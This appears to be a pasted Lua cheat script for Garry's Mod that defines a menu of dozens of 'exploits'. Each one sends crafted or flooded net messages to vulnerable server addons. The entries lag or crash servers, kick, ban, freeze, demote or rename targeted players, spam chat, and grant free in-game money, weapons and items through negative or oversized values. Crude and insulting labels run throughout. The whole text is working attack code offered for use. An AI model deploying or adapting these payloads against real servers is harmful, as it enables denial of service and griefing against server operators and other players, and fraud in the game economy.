- s.AddExploit(2,"Lags? #13","Just lags","textstickers_entdata",function()
- for j=1,100 do
- net.Start( "textstickers_entdata" )
- net.WriteUInt( 0xFFFFFFF, 32 )
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_13",0.5 )
- s.AddExploit(4,"Fuck name for all","type name in textentry","NC_GetNameChange",function()
- for k, v in pairs( player.GetAll() ) do
- net.Start("NC_GetNameChange")
- net.WriteEntity(v)
- net.WriteString(s.TE:GetText())
- net.WriteString(s.TE:GetText())
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(1,"Shitty console spam","type spam message in textentry","",function()
- for i=1, 10 do
- LocalPlayer():ConCommand( "_u "..s.TE:GetText() )
- end
- end, 1,0,"_sex_shit_con_spamer",0.1)
- s.AddExploit(2,"Lags? #14","Just lags","Keypad",function()
- for i = 1, 1000 do
- net.Start("Keypad")
- net.WriteEntity(LocalPlayer())
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_14",0)
- s.AddExploit(4,"God","Gives u godmode lol","RevivePlayer",function()
- if(!LocalPlayer():Alive())then
- net.Start("RevivePlayer")
- net.WriteEntity(LocalPlayer())
- net.SendToServer()
- end
- end, 1,0,"_sex_god",1)
- s.AddExploit(3,"Free rp weapons","Gives u 3 weapons","ARMORY_RetrieveWeapon",function()
- for i=1,3 do
- timer.Simple(i,function()
- net.Start("ARMORY_RetrieveWeapon")
- net.WriteString("weapon"..tostring(i))
- net.SendToServer()
- end)
- end
- end, 0,0)
- if s.ChatClear then
- s.AddExploit(1,"Chat spam","real b1g spam","",function()
- for i=1,2 do
- ChatClear.Run()
- end
- end, 1,0,"_sex_chat_kill",0.01)
- s.AddExploit(1,"Chat spam OOC","real b1g spam","",function()
- for i=1,2 do
- ChatClear.OOC()
- end
- end, 1,0,"_sex_chat_kill_2",0.01)
- end
- s.AddExploit(3,"Free rp money #6","Gives u free money from roll","ckit_roul_bet",function()
- net.Start("ckit_roul_bet")
- net.WriteEntity(LocalPlayer())
- net.WriteString("")
- net.WriteString("")
- net.WriteUInt(tonumber(s.TE:GetText()), 16)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Fuck names free","Fuck all rp names its cool","NC_GetNameChange",function()
- for k, v in pairs( player.GetAll() ) do
- net.Start("NC_GetNameChange")
- net.WriteEntity(v)
- net.WriteString(" ")
- net.WriteString(" ")
- net.SendToServer()
- end
- end, 1,0,"_sex_fuckname",5)
- s.AddExploit(4,"Legit server crash","absolytely legit lol","NET_SS_DoBuyTakeoff",function()
- net.Start( "NET_SS_DoBuyTakeoff" )
- net.WriteEntity(LocalPlayer())
- net.WriteEntity(table.Random(player.GetAll()))
- net.WriteTable({})
- net.WriteInt(-100000000 , 16)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(1,"ByB Force Bail","idk that copypaste","Letthisdudeout",function()
- net.Start("Letthisdudeout")
- net.WriteEntity(LocalPlayer())
- net.SendToServer()
- end, 0,0)
- s.AddExploit(2,"Fuck Player Chat","just lag player who use atlas chat","atlaschat.chat",function() -- need a test with lox
- for i=1,#s.Target do
- net.Start("atlaschat.rqclrcfg")
- net.WriteString(s.Target[i]:Name())
- net.SendToServer()
- end
- end, 1,0,"_sex_atlas_fuck",0.1)
- s.AddExploit(3,"Kick Targets","just kick selected players","plyWarning",function()
- for i=1,#s.Target do
- timer.Simple(i,function()
- net.Start("plyWarning")
- net.WriteEntity(s.Target[i])
- net.WriteString('You have to select a player before doing a action.')
- net.SendToServer()
- end)
- end
- end, 0,0)
- s.AddExploit(3,"Freeze Targets","just freeze selected players","NLR.ActionPlayer",function()
- for i=1,#s.Target do
- net.Start("NLR.ActionPlayer")
- net.WriteEntity(s.Target[i])
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Kick Targets","just kick selected players","uPLYWarning",function()
- for i=1,#s.Target do
- timer.Simple(i,function()
- for j=0, 1000 do
- net.Start("uPLYWarning")
- net.WriteEntity(s.Target[i])
- net.WriteString('You have to select a player before doing a action.')
- net.SendToServer()
- end
- end)
- end
- end, 0,0)
- s.AddExploit(3,"Ban Targets","just ban selected players","banleaver",function()
- for i=1,#s.Target do
- net.Start("banleaver")
- net.WriteString(tostring(s.Target[i]:SteamID().."{sep}"..tostring(s.Target[i]:Name())))
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(2,"Lags? #15","Just lags","DarkRP_spawnPocket",function()
- for i=1,10000 do
- net.Start("DarkRP_spawnPocket")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_15",1)
- s.AddExploit(3,"Free rp money #7","Gives u free money from hit","hhh_request",function()
- local hitRequest = {}
- hitRequest.hitman = LocalPlayer()
- hitRequest.requester = LocalPlayer()
- hitRequest.target = table.Random(player.GetAll())
- hitRequest.reward = -999999
- net.Start( 'hhh_request' )
- net.WriteTable( hitRequest )
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #8","Gives u free money from hit","hitcomplete",function()
- net.Start("hitcomplete")
- net.WriteDouble( GetConVarNumber("bh_hitmenuammount") )
- net.SendToServer()
- end, 1,0,"_sex_izi_money",1)
- s.AddExploit(3,"Kick Targets","just kick selected players","GetCar",function()
- for i=1,#s.Target do
- timer.Simple(i,function()
- for j=0, 700 do
- net.Start("GetCar")
- net.WriteEntity(s.Target[i])
- net.WriteEntity(s.Target[i])
- net.SendToServer()
- end
- end)
- end
- end, 0,0)
- s.AddExploit(3,"Duel Crazy","Fuck all with all","DuelMessageReturn",function()
- s.duel[1] = table.Random( player.GetAll() )
- s.duel[2] = table.Random( player.GetAll() )
- net.Start("DuelMessageReturn")
- net.WriteFloat(1)
- net.WriteTable(s.duel)
- net.SendToServer()
- end, 1,0,"_sex_duel_exploit",0.1)
- s.AddExploit(2,"Lags? #16","Just lags","dLogsGetCommand",function()
- for i=1,7000 do
- net.Start('dLogsGetCommand')
- net.WriteTable(s.lagz16)
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_16",3)
- s.AddExploit(3,"Remove shit","Just remove Targets & text entry class props","MDE_RemoveStuff_C2S",function()
- for i=1,#s.Target do
- net.Start( "MDE_RemoveStuff_C2S" )
- net.WriteTable( {DATA="",TARGET=s.Target[i]} )
- net.SendToServer()
- end
- for i=1,#ents.FindByClass(s.TE:GetText()) do
- net.Start( "MDE_RemoveStuff_C2S" )
- net.WriteTable( {DATA="",TARGET=ents.FindByClass(s.TE:GetText())[i]} )
- net.SendToServer()
- end
- end, 1,0,"_sex_godly_remover",2)
- s.AddExploit(1,"Break handcuffs","Try its free!","Kun_ZiptieStruggle",function()
- for i=0,30 do
- net.Start("Kun_ZiptieStruggle")
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #9","Gives u free money from drugs","Kun_SellDrug",function()
- net.Start("Kun_SellDrug")
- net.WriteString("Meth")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #10","Gives u free money from carz","BuyCar",function()
- net.Start("BuyCar")
- net.WriteFloat(-1000000000000)
- net.WriteEntity(LocalPlayer())
- net.WriteString(s.LagText)
- net.WriteString(s.LagText)
- net.WriteString(s.LagText)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #11","Gives u free money from vcmod","AttemptSellCar",function()
- for i=0,30 do
- for i=1,10 do
- net.Start( "AttemptSellCar" )
- net.WriteInt( i, 8 )
- net.SendToServer()
- end
- end
- end, 0,0)
- s.AddExploit(3,"Get Free le car","Write number in text entry (0 or 1 or more)","race_accept",function()
- net.Start("race_accept")
- net.WriteInt(tonumber(s.TE:GetText()),16)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(2,"Lags? #17","Just lags","ats_send_toServer",function()
- for i=1,2000 do
- net.Start("ats_send_toServer")
- net.WriteTable(s.lags17)
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_17",0.5)
- s.AddExploit(2,"Spawn Track","idk shit","FIRE_CreateFireTruck",function()
- net.Start("FIRE_CreateFireTruck")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Ban Targets","ban selected players && textentry input - ban message","gBan.BanBuffer",function()
- for i=1,#s.Target do
- net.Start( "gBan.BanBuffer" )
- net.WriteBool( true )
- net.WriteInt( 0, 32 )
- net.WriteString( s.TE:GetText() )
- net.WriteString( s.Target[i]:SteamID() )
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(2,"Lags? #18","Just lags","pac.net.TouchFlexes.ClientNotify",function()
- for i=1, 400 do
- net.Start( "pac.net.TouchFlexes.ClientNotify" )
- net.WriteInt( 9999999999999999999999999999999999999999999999999999999999999999999998, 13)
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_18",0.3)
- s.AddExploit(3,"Free rp money #12","Gives u free money from shit","ply_pick_shit",function()
- for k, v in pairs (player.GetAll()) do
- for i = 1,255 do
- net.Start("ply_pick_shit")
- net.WriteEntity(LocalPlayer())
- net.WriteEntity(v)
- net.SendToServer()
- end
- end
- end, 0,0)
- s.AddExploit(2,"Give physgun","Gives u free physgun","BuyFirstTovar",function()
- net.Start("BuyFirstTovar")
- net.WriteString("0")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(2,"Give physgun","Gives u free physgun","BuySecondTovar",function()
- net.Start("BuySecondTovar")
- net.WriteString("0")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(4,"Set Health","type number of health in textentry","GiveHealthNPC",function()
- net.Start("GiveHealthNPC")
- net.WriteString("100")
- net.SendToServer()
- end, 1,0,"_sex_gay_timer",1)
- s.AddExploit(1,"Free shitty key","key = gey","BuyKey",function()
- net.Start("BuyKey")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(1,"Free shitty case","case = cs go = shit","BuyCrate",function()
- net.Start("BuyCrate")
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free Weapons","gives u more free weapons","MONEY_SYSTEM_GetWeapons",function()
- for i = 1,32 do
- net.Start("MONEY_SYSTEM_GetWeapons")
- net.WriteInt(i, 8)
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(2,"Demote gays","demote targets","MCon_Demote_ToServer",function()
- for i = 1,#s.Target do
- net.Start("MCon_Demote_ToServer")
- net.WriteString(s.Target[i]:SteamID())
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #13","Gives u free money from printerz","SyncPrinterButtons16690",function()
- for k, v in pairs(ents.GetAll()) do
- if v:GetModel() == "models/props_c17/consolebox01a.mdl" then
- net.Start( "SyncPrinterButtons16690" )
- net.WriteEntity(v)
- net.WriteUInt(2, 4)
- net.SendToServer()
- end
- end
- end, 1,0,"_sex_rp_shit_13",5)
- s.AddExploit(3,"Free rp money #14","Gives u free money from printerz","withdrawp",function()
- for k,v in pairs(ents.FindByClass("derma_printer")) do
- net.Start("withdrawp")
- net.WriteEntity(v)
- net.SendToServer()
- end
- print("printerov:".. tostring(#ents.FindByClass("derma_printer")))
- end, 1,0,"_sex_rp_shit_14",5)
- --ents.FindByClass("derma_printer")
- s.AddExploit(3,"Free rp money #99","Gives u free money from printerz","wordenns",function()
- for k,v in pairs(ents.FindByClass("derma_printer")) do
- net.Start("wordenns")
- net.WriteEntity(v)
- net.SendToServer()
- end
- print("printerov:".. tostring(#ents.FindByClass("derma_printer")))
- end, 1,0,"_sex_rp_shit_99",5)
- s.AddExploit(3,"Free rp money #15","Gives u free money from shit","DarkRP_SS_Gamble",function()
- net.Start( "DarkRP_SS_Gamble" )
- net.WriteInt(50000, 32)
- net.WriteInt(1, 32)
- net.WriteInt(0, 32)
- net.WriteInt(0, 32)
- net.WriteInt(1, 32)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #16","Gives u free money from printerz","SyncPrinterButtons76561198056171650",function()
- for k, v in pairs(ents.GetAll()) do
- if( v:GetClass():find("print") ) then
- net.Start( "SyncPrinterButtons76561198056171650" )
- net.WriteEntity(v)
- net.WriteUInt(2, 4)
- net.SendToServer()
- end
- end
- end, 1,0,"_sex_rp_shit_16",5)
- s.AddExploit(2,"Unbox shit","idk check pointshop2 (F*)","net_PSUnBoxServer",function()
- for k,v in pairs(player.GetAll()) do
- local i = 0
- for k2,v2 in pairs(PS.Items) do
- if !v:PS_HasItem(v2.ID) then
- timer.Simple(k*i*1.7,function()
- net.Start("net_PSUnBoxServer")
- net.WriteEntity(v)
- net.WriteString(v2.ID)
- net.SendToServer()
- end)
- end
- i = i + 1
- end
- end
- end, 0,0)
- s.AddExploit(3,"Kick targetz #idk","select gays and kick they","RecKickAFKer",function()
- for i=1,#s.Target do
- net.Start("RecKickAFKer")
- net.WriteEntity(s.Target[i])
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(2,"Lags? #19","Just lags","TFA_Attachment_RequestAll",function()
- for i=1, 500 do
- net.Start("TFA_Attachment_RequestAll")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_19",0.05)
- s.AddExploit(3,"Free rp money #17","Select target & money count","75_plus_win",function()
- for i=1,#s.Target do
- net.Start( "75_plus_win" )
- net.WriteString(s.TE:GetText())
- net.WriteEntity(s.Target[i])
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #18","just money (number in text entry)","ATMDepositMoney",function()
- net.Start( "ATMDepositMoney" )
- net.WriteFloat( tonumber(s.TE:GetText()) )
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #19","gives u free money from mining","SellMinerals",function()
- for k,v in pairs(SkillDB) do
- if not ( v.iSkill == true ) then
- net.Start("Upgrade")
- net.WriteTable( { LuaName = v.LuaName, Amount = -100000000 } )
- net.SendToServer()
- net.Start( "SellMinerals" )
- net.WriteTable( { Target = LocalPlayer() } )
- net.SendToServer()
- end
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #20","gives u free money from bet","TakeBetMoney",function()
- net.Start( "TakeBetMoney" )
- net.WriteTable({1e333333 , 1e333333})
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #21","gives u free money from oil","Kun_SellOil",function()
- for k,v in pairs(ents.GetAll()) do
- net.Start("Kun_SellOil")
- net.WriteEntity(v)
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #22","gives u free money from deposit (number in text entry)","Kun_SellOil",function()
- for k,v in pairs(player.GetAll()) do
- net.Start( "DepositMoney" )
- net.WriteEntity(v)
- net.WriteString(tonumber(s.TE:GetText()) )
- net.WriteEntity(v)
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #23","gives u free money from taxi (number in text entry)","NET_EcSetTax",function()
- net.Start("NET_EcSetTax")
- net.WriteInt(tonumber(s.TE:GetText()) , 16)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #24","Select target & money count","RP_Accept_Fine",function()
- for i=1,#s.Target do
- net.Start("RP_Accept_Fine")
- net.WriteString(s.Target[i])
- net.WriteDouble(tonumber(s.TE:GetText()))
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #25","gives u free money from shop","CRAFTINGMOD_SHOP",function()
- net.Start("CRAFTINGMOD_SHOP")
- net.WriteTable({
- BUY = -100000000,
- type = 1
- })
- net.WriteInt(1,16)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(4,"Auto-loot","collect all loot on map","GMBG:PickupItem",function()
- for k, v in pairs(ents.GetAll()) do
- if v:GetClass() == "item_loot" then
- for i=1,6 do
- net.Start("GMBG:PickupItem")
- net.WriteEntity(v)
- net.SendToServer()
- end
- end
- end
- end, 1,0,"_sex_autoloot_1",2)
- s.AddExploit(3,"Free rp money #26","gives u free money from kart","kart_sell",function()
- for i=1, 300 do
- net.Start("kart_sell")
- net.WriteString("sw_gokart")
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(3,"Free rp money #27","gives u free money (number in text entry)","ClickerAddToPoints",function()
- net.Start("ClickerAddToPoints")
- net.WriteInt(tonumber(s.TE:GetText()), 32)
- net.SendToServer()
- end, 0,0)
- s.AddExploit(3,"Free rp money #28","gives u free money (number in text entry)","TOW_SubmitWarning",function()
- for k,v in pairs(ents.GetAll()) do
- net.Start("TOW_SubmitWarning")
- net.WriteString(LocalPlayer():SteamID())
- net.WriteDouble(tonumber(s.TE:GetText()))
- net.WriteEntity(v)
- net.SendToServer()
- net.Start("TOW_PayTheFine")
- net.WriteEntity(v)
- net.SendToServer()
- end
- end, 0,0)
- s.AddExploit(2,"Lags? #23","Just lags","sphys_dupe",function()
- for i=1,2200 do
- net.Start("sphys_dupe")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_23",0.2)
- s.AddExploit(2,"Lags? #24","Just lags","minigun_drones_switch",function()
- for i=1,2200 do
- net.Start("minigun_drones_switch")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_24",0.2)
- s.AddExploit(2,"CW2 Lags? #25","Just lags (u need cw2 weapon in hand)","CW20_PRESET_LOAD",function()
- if(LocalPlayer():GetActiveWeapon():GetClass():find("cw"))then
- for i=1,2200 do
- net.Start("CW20_PRESET_LOAD")
- net.SendToServer()
- end
- end
- end, 1,0,"_sex_lagz_25",0.2)
- s.AddExploit(2,"Lags? #25","Just lags","dronesrewrite_controldr",function()
- for i=1,2200 do
- net.Start("dronesrewrite_controldr")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_25",0.2)
- s.AddExploit(2,"Lags? #26","Just lags","SBP_addtime",function()
- for i=1,2000 do
- net.Start("SBP_addtime")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_26",0.3)
- s.AddExploit(3,"XP booster","gives u xp (enter boost in shit her)","SBP_addtime",function()
- for i=1,tonumber(s.TE:GetText()) do
- net.Start("SBP_addtime")
- net.SendToServer()
- end
- end, 1,0,"_sex_xp_boost",0.2)
- s.AddExploit(3,"Poop on player","spam effects on selected player","simfphys_gasspill",function()
- for i=1,#s.Target do
- for j=1,3 do
- if IsValid(s.Target[i]) then
- net.Start("simfphys_gasspill")
- net.WriteVector(s.Target[i]:GetPos()+Vector(0,0,90))
- net.WriteVector(s.Target[i]:EyePos())
- net.SendToServer()
- end
- end
- end
- end, 1,0,"_sex_pooper",0.1)
- s.AddExploit(3,"test","Just test","friendlist",function()
- for i=1,500 do
- net.Start("friendlist")
- net.WriteTable({"ur father"})
- net.SendToServer()
- end
- end, 1,0,"test",0.2)
- s.AddExploit(3,"Outfit player nouser","Just noise players near u","NetData",function()
- for i=1,200 do
- net.Start("NetData")
- net.WriteString("OF")
- net.WriteUInt(4,8)
- net.WriteData(math.random(100000,9999999)..",sis.mdl",30)
- net.SendToServer()
- end
- end, 1,0,"_sex_ofn",0.2)
- -- leith cool shit (untested)
- s.AddExploit(2,"Lags? #27","Just lags","IGS.GetPaymentURL",function()
- for i=1,1100 do
- net.Start("IGS.GetPaymentURL")
- net.WriteDouble(9999999999999999999999999999999999999999999999999999999999)
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_27",0.2)
- s.AddExploit(2,"Lags? #28","Just lags","pp_info_send",function()
- for i=1,2200 do
- net.Start("pp_info_send")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_28",0.2)
- s.AddExploit(2,"Lags? #29","Just lags","BeginSpin",function()
- for i=1,2200 do
- net.Start("BeginSpin")
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_29",0.2)
- --
- s.AddExploit(2,"Lags? #30","Just lags","RHC_jail_player",function()
- for i=1,550 do
- net.Start("RHC_jail_player")
- net.WriteEntity(game.GetWorld())
- net.WriteFloat(-9999.999999999999999999999999999999999999999999)
- net.SendToServer()
- end
- end, 1,0,"_sex_lagz_30",0.2)
- s.AddExploit(3,"Free Moneyz","Monyez from bitcoins (untested)","BM2.Command.SellBitcoin",function()
- for k, v in pairs(ents.FindByClass("bm2_bitminer_1")) do
- net.Start("BM2.Command.SellBitcoins")
- net.WriteEntity(v)
- net.SendToServer()
- end
- for k, v in pairs(ents.FindByClass("bm2_bitminer_2")) do
- net.Start("BM2.Command.SellBitcoins")
- net.WriteEntity(v)
- net.SendToServer()
- end
- for k, v in pairs(ents.FindByClass("bm2_bitminer_rack")) do
- net.Start("BM2.Command.SellBitcoins")
- net.WriteEntity(v)
- net.SendToServer()
- end
- end, 0,0)
- --[[
- cpk_remove
- s.AddExploit(1,"name","desc","netstr",function()
- end, 1,0,"timername",0.5)
- gcap_victim ControllerAction
- SmartTurret_Tag XMark SpecDM_SendLoadout (в сенд лоадаут 2 стринга) friendlist
- net.Start("friendlist")
- net.WriteTable({"ur father"})
- net.SendToServer()
- ]]--
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement